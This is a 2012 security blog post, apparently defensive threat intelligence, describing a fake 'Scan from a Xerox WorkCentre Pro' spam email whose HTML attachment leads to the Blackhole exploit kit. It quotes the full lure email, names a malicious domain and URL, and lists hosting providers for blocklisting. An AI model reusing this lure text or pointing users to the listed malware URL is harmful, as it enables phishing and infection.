Sponsored by..

Sunday, 12 February 2012

"Scan from a Xerox WorkCentre Pro" spam with malicious attachment / cojsdhfhhlsl.ru

Here's a slightly new twist on a very familiar theme, with an email attachment that contains an HTML page with obfuscated javascript.. leading to malware.

Date:      Sun, 11 Feb 2012 12:26:18 +0100
From:      "JANICE Heller" [KailaStuck@engineeringdesign.com]
Subject:      Re: Scan from a Xerox WorkCentre Pro #383806
Attachments:     Xerox_Doc_X30366.htm

Please open the attached document. It was scanned and sent

to you using a Xerox WorkCentre Pro.

Sent by: Guest
Number of Images: 8
Attachment File Type: .HTML [Internet Explorer Format]

WorkCentre Pro Location: machine location not set
Device Name: KDX157PS0MSUDX382782

The file Xerox_Doc_X30366.htm attempts to open a malicious web page at cojsdhfhhlsl.ru:8080/images/aublbzdni.php which contains the Blackhole exploit kit (the Wepawet report is here).

This domain is multihomed on some very familar looking IP addresses.. in fact, they are almost identical to this spam attack. If you have blocked those IPs then you will be protected against this one.

For the record, the IPs and hosts are: (OVH Systems, France) (Amazon Data Services, Ireland) (Steadfast Networks, US) (Slicehost, US) (Slicehost, US) (Comcast Business Communications, US) (Colopronto, US) (iPower, US) (MVN Systems Ltd, Bulgaria) (Neterra Ltd, Bulgaria) (Free SAS / ProXad, France) (SiliconTower, Spain) (Hosting Services Inc, US) (Web24 Pty Ltd, Australia) (Slicehost, US) (Linode, US) (ThePlanet, US) (Slicehost, US) (Slicehost, US) (Slicehost, US) (G2KHosting, Argentina) (Century Telecom Ltda, Brazil) (Jaidee Daijai, US) (Slicehost, US)

If you need a plain listing for pasting into a blocklist, use:

No comments: